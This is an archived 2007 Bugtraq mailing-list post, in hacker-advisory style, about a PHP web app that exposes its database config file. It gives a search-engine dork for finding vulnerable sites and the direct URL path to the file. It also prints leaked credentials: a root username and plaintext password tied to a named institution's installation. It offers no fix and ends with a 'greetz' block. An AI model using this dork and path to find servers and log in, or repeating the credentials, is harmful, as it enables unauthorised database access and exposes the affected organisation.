lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20070209161059.31926.qmail@securityfocus.com>
Date: 9 Feb 2007 16:10:59 -0000
From: gokhankaya@...mail.com
To: bugtraq@...urityfocus.com
Subject: Capital Request Forms Db Username and Password Vulnerabilities

##################################################################################
#
# Title		: Capital Request Forms Db Username and Password Vulnerabilities
# Author	: Gokhan
# Contact	: gokhankaya@...mail.com 
# Dork		: inurl:common_db.inc
#
# Script	: http://selfemployment.douglas.bc.ca/caprequest/
#
# ExpLoit 	: http://[site]/[path]/inc/common_db.inc    ;)
#
#
# Code		: common_db.inc
#
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+							+
+  $dbhost = "localhost";	// DBHOST NAME		+
+  $dbusername = "root";	// DB USER NAME		+
+  $dbuserpassword = "sql1234";	// DB USER PASSWORD	+
+  $default_dbname = "douglas";	// DB NAME		+
+							+
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++
#
#
# <?php function Tesekkurler() {
#       $thnx="GreetZ";
#       print ("$thnx : BLaCKWHITE,CanberX,LGMAN,HackerBox.EU");
#	} Tesekkurler(); 
#	// FROM TURKEY  ?>
#
#
##################################################################################

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ